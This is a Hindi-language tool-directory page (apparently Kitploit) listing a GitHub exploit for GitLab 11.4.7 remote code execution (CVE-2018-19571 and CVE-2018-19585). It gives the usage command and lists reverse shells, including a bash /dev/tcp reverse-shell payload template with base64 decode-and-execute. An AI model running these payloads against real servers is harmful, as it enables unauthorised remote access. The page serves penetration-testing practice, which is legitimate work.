Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
gitlab-RCE-11.4.7 — GitLab 11.4.7 RCE exploit विभिन्न reverse shells के साथ। CVE-2018-19571 + CVE-2018-19585 | Kitploit
उपकरण/GitHubGitHub/algafix/gitlab-rce-11.4.7
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंगपेलोड डेवलपमेंट
GitHubalgafix/gitlab-rce-11.4.7

gitlab-RCE-11.4.7

GitLab 11.4.7 RCE exploit विभिन्न reverse shells के साथ। CVE-2018-19571 + CVE-2018-19585

रिपॉजिटरी देखें
335 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

gitlab-RCE-11.4.7

GitLab 11.4.7 CE RCE एक्सप्लॉइट विभिन्न रिवर्स शेल के साथ। CVE-2018-19571: https://nvd.nist.gov/vuln/detail/CVE-2018-19571 CVE-2018-19585: https://nvd.nist.gov/vuln/detail/CVE-2018-19585

Sam Redmond और Tam Lai Yin के संस्करण का संशोधन, सीखने और अभ्यास करने के लिए।

उपयोग कैसे करें

यह python3 में लिखा गया है, जैसा कि सब कुछ होना चाहिए।

निर्भरताएँ:

root@kitploit:~
pip3 install requests

उपयोग:

root@kitploit:~
python3 rce_script.py -u <username> -p <password> -g <url:port> -l <local ip> -P <local port> [<shell lang>]

डिफ़ॉल्ट रूप से, netcat का -e विकल्प वाला शेल उपयोग किया जाता है।

अंतर्निहित शेल

वर्तमान अंतर्निहित शेल:

  • nc_e
    • Netcat का -e विकल्प।
  • bash:
    • पूर्ण पथ के साथ निष्पादित Bash।
  • perl:
    • $PATH से निष्पादित Perl।
  • python3:
    • $PATH से निष्पादित Python3।
  • ruby:
    • $PATH से निष्पादित Ruby।
  • php:
    • $PATH से निष्पादित PHP। नोट: सामान्यतः GitLab डॉकर में काम नहीं करता।

उपयोगकर्ता-परिभाषित शेल जोड़ें

कुछ शेल में ऐसे अक्षर होते हैं जो अनुरोध एन्कोडिंग के साथ मेल नहीं खाते। इसलिए उन्हें Base64 में एन्कोड किया जाता है और फिर डिकोड करके पीड़ित की मशीन पर निष्पादित किया जाता है।

यदि आप अपना स्वयं का शेल जोड़ना चाहते हैं, तो payloads_dict संरचना में एक मान जोड़ें।

आपको निम्नलिखित परिभाषित करना होगा:

root@kitploit:~
'bash': {
    # If the raw_payload can be executed withoud encoding
    'safe': False,
    # Payload, must contain the references for the local_ip and for the local_port
    'raw_payload': 'bash -i >& /dev/tcp/{local_ip}/{local_port} 0>&1',
    # How to execute the payload if safe is False. Must conatin the reference for payload
    'exec_string': 'echo {payload} | base64 -d | /bin/bash'
}

अस्वीकरण

HTML पार्सिंग काफी हार्डकोडेड है, यह आसानी से टूट सकता है।

टूल डाउनलोड करें